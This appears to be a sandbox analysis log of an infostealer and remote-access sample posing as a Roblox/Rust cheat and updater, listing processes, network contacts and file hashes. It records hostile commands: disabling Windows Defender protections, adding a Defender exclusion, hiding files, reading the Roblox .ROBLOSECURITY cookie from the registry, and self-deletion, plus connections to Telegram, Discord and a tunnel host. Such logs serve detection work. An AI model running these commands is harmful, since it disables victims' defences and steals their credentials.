C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Roaming\svhost.exe

C:\Users\Admin\AppData\Roaming\svhost.exe

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
NL 23.62.61.99:443 www.bing.com tcp
US 8.8.8.8:53 45.19.74.20.in-addr.arpa udp
US 8.8.8.8:53 73.143.109.104.in-addr.arpa udp
US 8.8.8.8:53 99.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 227.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discordapp.com udp
US 162.159.133.233:443 discordapp.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 233.133.159.162.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
GB 172.217.16.227:443 gstatic.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 api.telegram.org udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 answer-riverside.gl.at.ply.gg udp
US 147.185.221.19:45691 answer-riverside.gl.at.ply.gg tcp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discordapp.com udp
US 162.159.129.233:443 discordapp.com tcp
US 8.8.8.8:53 233.129.159.162.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discordapp.com udp
US 162.159.130.233:443 discordapp.com tcp
US 8.8.8.8:53 233.130.159.162.in-addr.arpa udp
US 8.8.8.8:53 answer-riverside.gl.at.ply.gg udp
US 147.185.221.19:45691 answer-riverside.gl.at.ply.gg tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 95.143.109.104.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discordapp.com udp
US 162.159.133.233:443 discordapp.com tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 answer-riverside.gl.at.ply.gg udp
US 147.185.221.19:45691 answer-riverside.gl.at.ply.gg tcp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discordapp.com udp
US 162.159.133.233:443 discordapp.com tcp
US 8.8.8.8:53 answer-riverside.gl.at.ply.gg udp
US 147.185.221.19:45691 answer-riverside.gl.at.ply.gg tcp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discordapp.com udp
US 162.159.130.233:443 discordapp.com tcp
US 8.8.8.8:53 answer-riverside.gl.at.ply.gg udp
US 147.185.221.19:45691 answer-riverside.gl.at.ply.gg tcp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp

Files

memory/3460-0-0x00007FF842863000-0x00007FF842865000-memory.dmp

memory/3460-1-0x00000000004F0000-0x00000000006D6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Loader.exe

MD5 8f77f8b13b914f358059e3f7b9ddab70
SHA1 d406a28486b4dd881c454e526e149b98c0ec8462
SHA256 c22c863186e9e86a07cdb7f214c4acede216405a09d4032a603e64931f6966e6
SHA512 b00ba88d36203e389021672b39839a172b58e492bb71afb33c9f53b9ba406a0cf5d61cb5bfe6f11dc40529be8424690737ce178d7dd4981b120ec4694f51abad

C:\Users\Admin\AppData\Local\Temp\sol.exe

MD5 25daefc71be60b76cb49fc81424d768d
SHA1 48be475dd36b433d62d4f7fed9b4d81a90122dee
SHA256 1b27df9e577ab790cafdae0b1ef25ccecdf5f7e2a1ede0d83a3ca32e2987d80a
SHA512 e343905d83bdf353fe759ba5dc4de5bc2e7b1e465066bb4d09388209151e72dfd8df7da780882c533cdc3ee24933de123a8630d6a177bba0ad4d65efc39fadfe

memory/1732-21-0x00000000009F0000-0x0000000000A1A000-memory.dmp

memory/1732-19-0x00007FF842860000-0x00007FF843321000-memory.dmp

memory/3460-24-0x00007FF842860000-0x00007FF843321000-memory.dmp

memory/3460-11-0x00007FF842860000-0x00007FF843321000-memory.dmp

C:\hostNet\rlqSVEj.vbe

MD5 92408a105526970fa12ef23225de61ae
SHA1 bf70e8e671c10bf85771b2b8dd4549766cf79582
SHA256 b4f3f50e48c35a2d03d9e96175722f1c4669e8529c2347f4f17377b2ad726b10
SHA512 56df36df05187743357f3cda16f2b7791c4c760475b90f173ad3d0752475aee45e6549e062ee328f3b1f2ebd56aaa1bb9ceedb1f3200e2383455ac27e1cee043

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Solara_Updater.exe.log

MD5 2ff39f6c7249774be85fd60a8f9a245e
SHA1 684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256 e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA512 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

C:\Users\Admin\AppData\Local\Temp\XClient.exe

MD5 28ff989c1d462f567aabb9c5ba76456b
SHA1 24be926b14f64f6a9f5b8248d1618bae9a7fc0b2
SHA256 a02fb0b588d89b4ea7f83fc303af6ab00b5ec81a39cf79b2e6ec65d3a3e4c63d
SHA512 2e639e5b5480c93c7605480de40e325c0692d3834f305d7d739f3569707e01cbd5d4c75c5fe4b02616edbb5c72b5f9df6466864a2b11fc862b35b5566d51bcba

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

MD5 ff8f5c2670894f74456e534b34d6a8fe
SHA1 e0b35ae06f68adf07e4616da8e91bb1f935e492a
SHA256 d9f3baf81271c395f4dc10e21d12bc2bfb875a8a28ede54abd54a0d8de194d37
SHA512 a58b08c3209bc196f914a82ca2b91a096988831bc45babb22ec2210303050cf03923ebf93e7a58926b8813328c672bec015cd0772f27a0192c661d83e796ffff

memory/3376-63-0x0000000000470000-0x0000000000486000-memory.dmp

memory/3340-68-0x000001A8475E0000-0x000001A847620000-memory.dmp

memory/1732-69-0x00007FF842860000-0x00007FF843321000-memory.dmp

memory/1736-75-0x00000144D95E0000-0x00000144D9602000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yny4dbjw.ht0.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 77d622bb1a5b250869a3238b9bc1402b
SHA1 d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256 f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512 d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

memory/3340-96-0x000001A861D30000-0x000001A861DA6000-memory.dmp

memory/3340-97-0x000001A861DB0000-0x000001A861E00000-memory.dmp

memory/3340-98-0x000001A847C10000-0x000001A847C2E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 966914e2e771de7a4a57a95b6ecfa8a9
SHA1 7a32282fd51dd032967ed4d9a40cc57e265aeff2
SHA256 98d3c70d7004fa807897317bd6cd3e977b9b6c72d4d2565aca0f9f8b1c315cba
SHA512 dc39c7124a9c7c8d4c7e8e16290c46360b8d9a8f4e43edaacbbeb09bdcf20159a53db54d2b322372001b6a3de52b2f88e9088b5fdbc7638816ae0d122bb015f5

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Loader.exe.log

MD5 bb6a89a9355baba2918bb7c32eca1c94
SHA1 976c76dfbc072e405ce0d0b9314fe5b9e84cb1b2
SHA256 192fbb7f4d1396fd4846854c5472a60aa80932f3c754f2c2f1a2a136c8a6bb4b
SHA512 efdf0c6228c3a8a7550804ac921dfefc5265eb2c9bbf4b8b00cedd427c0a5adf610586b844ff444bd717abff138affcbe49632ce984cbffc5fa8019b4ba6ec0f

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b0a78e60bfb279d18fd3d6e7a67411f5
SHA1 9344fe3654a14bc66afb9dc6ea215fabfbe5c906
SHA256 a28890c82033d3deaf5770ecd1b0239c77321acc93704b1d4b1e167b91e30aeb
SHA512 9548be23bec645cd705482f78d43b63659e38cf879c34f7071f42fd86ee02039379a5e92fbe0f1c74c12aaebabdd8002f57eba111d3e855cbd0c89a110e346f2

memory/3340-144-0x000001A861CD0000-0x000001A861CDA000-memory.dmp

memory/3340-145-0x000001A861D10000-0x000001A861D22000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 107102102e02e48f37f5318c7e113c43
SHA1 7fb10fc65c85fb4c050309f0872bc9389dcccc0d
SHA256 3c3f49948c1e832c86b959c32bc288ddedb500534b74df082f8967fc7f9976f7
SHA512 b108a47d7c3dd154cad44362b6cd557b7064096383d100e6cd64bfb19c4e2ad878ed4ee800776322ad3cc4bb721fb675b0ecab8f5661024188fa3aa19561841b

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RustCheat.exe.log

MD5 4c8fa14eeeeda6fe76a08d14e08bf756
SHA1 30003b6798090ec74eb477bbed88e086f8552976
SHA256 7ebfcfca64b0c1c9f0949652d50a64452b35cefe881af110405cd6ec45f857a5
SHA512 116f80182c25cf0e6159cf59a35ee27d66e431696d29ec879c44521a74ab7523cbfdefeacfb6a3298b48788d7a6caa5336628ec9c1d8b9c9723338dcffea4116

C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat

MD5 02d21af8c5d6e8e0240a01325bcc4154
SHA1 ce58641040b6fe35d465a8a6932c277c7ff37ee5
SHA256 31498b70dce38481c709a35f22dbab0bde2be880abe88d6c90b7a96bf9f070b7
SHA512 758201561db3058e8d6d18c9a838fd49aa612fe0ef544479cc5776e4618ee4e90245b41b1bdb90257298c27fb6ee2589a262f8143816fa091be88a1ca977f7e8

C:\hostNet\bridgeblockportComBroker.exe

MD5 8ccc428a5a6f6139dc191d332f3de08b
SHA1 ae550a8fb67deeb1350020aa3fe8b0339db6bc71
SHA256 801c5ad5a7853f375e15e1da7361e09b898d3c8770e291b8016eb207bba8c749
SHA512 1479aac1b970722f47cbf77a01b213c84885af15b06e293bf9137863cbce44238832c5f4298dc56ca41847718f581d2bb434220824ffc5d54c08f1e55156e82e

memory/4328-249-0x0000000000040000-0x000000000021E000-memory.dmp

memory/4328-260-0x0000000000B00000-0x0000000000B0E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5b27d0f2e7023b0cb214f2d6320b5387
SHA1 2e5eeea0e9e6fc2162ad375aecddff7ed953d3e4
SHA256 6404e3da4c87b9969bc2ed0fd2a6377b61a7c10dfd70f7141b1d7ce4417cda23
SHA512 6794951bd4520340176063857917bc6f77d88d1acc26956b1af87c8d44393fc31094860b3811b2082765fec238877d2d5684bff9a11eb6efc2d8b8c5703456b3

memory/4328-263-0x000000001AE40000-0x000000001AE5C000-memory.dmp

memory/4328-265-0x000000001AE60000-0x000000001AE78000-memory.dmp

memory/4328-267-0x000000001AE20000-0x000000001AE28000-memory.dmp

memory/4328-269-0x000000001AE30000-0x000000001AE3C000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\14t0asow\14t0asow.cmdline

MD5 4e88b79fb2f9741d53ec8279a24351cf
SHA1 42c8e651a680a5f85c6f51006f7dbff0d50642ad
SHA256 36bbc6a85354c155aa4d61fdac64e36eaf129574978f32d0bbd01dfe7c605113
SHA512 f1d68ebee749c02b85290fb9ed8b5c0d1e9b8c148a0590bdf74cf009734bebf6ba5e89d84b7d48d7d592de43c15cc9b40a5bd07c954947eef0533ba40a3f673d

\??\c:\Users\Admin\AppData\Local\Temp\14t0asow\14t0asow.0.cs

MD5 e04ec06fc32499f4321fd268615f8d05
SHA1 e6d427299b826164aefd64f3f7e843459ee21f87
SHA256 61be5408c80ef4faa1c7a8829b4cd7810581d7272fa79f14d03aa4cee26d6c70
SHA512 381be5fc2d05616041adbe01649dd8645db70860101673495839c8746f1c0b71642ad76ab9cd9144de9e05c3e11012a36baa9475ce0a5f71f24adbde55dd352e

\??\c:\Program Files (x86)\Microsoft\Edge\Application\CSC421E32B0FE4E49CA8B405B3551F9DCDF.TMP

MD5 b5189fb271be514bec128e0d0809c04e
SHA1 5dd625d27ed30fca234ec097ad66f6c13a7edcbe
SHA256 e1984ba1e3ff8b071f7a320a6f1f18e1d5f4f337d31dc30d5bdfb021df39060f
SHA512 f0fcb8f97279579beb59f58ea89527ee0d86a64c9de28300f14460bec6c32dda72f0e6466573b6654a1e992421d6fe81ae7cce50f27059f54cf9fdca6953602e

memory/4328-366-0x000000001BD40000-0x000000001BDE9000-memory.dmp

memory/4328-367-0x000000001AED0000-0x000000001AED8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\aDkoXl2NVSRU0ly

MD5 8f5942354d3809f865f9767eddf51314
SHA1 20be11c0d42fc0cef53931ea9152b55082d1a11e
SHA256 776ecf8411b1b0167bea724409ac9d3f8479973df223ecc6e60e3302b3b2b8ea
SHA512 fde8dfae8a862cf106b0cb55e02d73e4e4c0527c744c20886681245c8160287f722612a6de9d0046ed1156b1771229c8950b9ac036b39c988d75aa20b7bac218

C:\Users\Admin\AppData\Local\Temp\91bqlp6xJn4BJDs

MD5 42c395b8db48b6ce3d34c301d1eba9d5
SHA1 b7cfa3de344814bec105391663c0df4a74310996
